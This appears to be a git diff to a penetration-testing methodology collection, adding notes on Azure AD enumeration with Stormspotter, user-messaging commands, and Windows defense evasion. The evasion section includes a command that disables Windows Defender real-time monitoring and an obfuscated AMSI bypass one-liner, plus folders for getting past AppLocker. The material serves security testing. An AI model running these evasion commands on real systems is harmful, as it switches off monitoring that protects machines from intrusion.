diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index f8c1857..056261a 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report- ``` +Stormspotter, graphing Azure and Azure Active Directory objects + +```powershell +$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18 +git clone https://github.com/Azure/Stormspotter +cd Stormspotter +pipenv install . +stormspotter --cli +stormdash -dbu -dbp +Browse to http://127.0.0.1:8050 to interact with the graph. +``` + +Other interesting commands to enumerate Azure AD. ```powershell # Azure AD powershell module @@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an ## References * [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/) -* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) * [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) * [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) * [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md new file mode 100644 index 0000000..1794178 --- /dev/null +++ b/Methodology and Resources/Miscellaneous - Tricks.md @@ -0,0 +1,17 @@ +# Miscellaneous & Tricks + +All the tricks that couldn't be classified somewhere else. + +## Send a message to another user + +```powershell +# Windows +PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" +PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" + +# Linux +$ wall "Stop messing with the XXX service !" +$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root +$ who +$ write root pts/2 # press Ctrl+D after typing the message. +``` \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index f71519c..095b4ed 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -6,7 +6,11 @@ * [Windows Version and Configuration](#windows-version-and-configuration) * [User Enumeration](#user-enumeration) * [Network Enumeration](#network-enumeration) -* [AppLocker Enumeration](#applocker-enumeration) +* [Antivirus & Detections](#antivirus--detections) + * [Windows Defender](#windows-defender) + * [AppLocker Enumeration](#applocker-enumeration) + * [Powershell](#powershell) + * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) * [Search for file contents](#search-for-file-contents) @@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` -## AppLocker Enumeration +## Antivirus & Detections + +### Windows Defender + +```powershell +# check status of Defender +PS C:\> Get-MpComputerStatus + +# disable Real Time Monitoring +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +``` + +### AppLocker Enumeration - With the GPO - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script). +List AppLocker rules + +```powershell +PS C:\> $a = Get-ApplockerPolicy -effective +PS C:\> $a.rulecollections +``` + +### Powershell + +Default powershell locations in a Windows system. + +```powershell +C:\windows\syswow64\windowspowershell\v1.0\powershell +C:\Windows\System32\WindowsPowerShell\v1.0\powershell +``` + +Example of AMSI Bypass. + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Default Writeable Folders + +```powershell +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\Tasks +C:\windows\tracing +``` + ## EoP - Looting for passwords ### SAM and SYSTEM files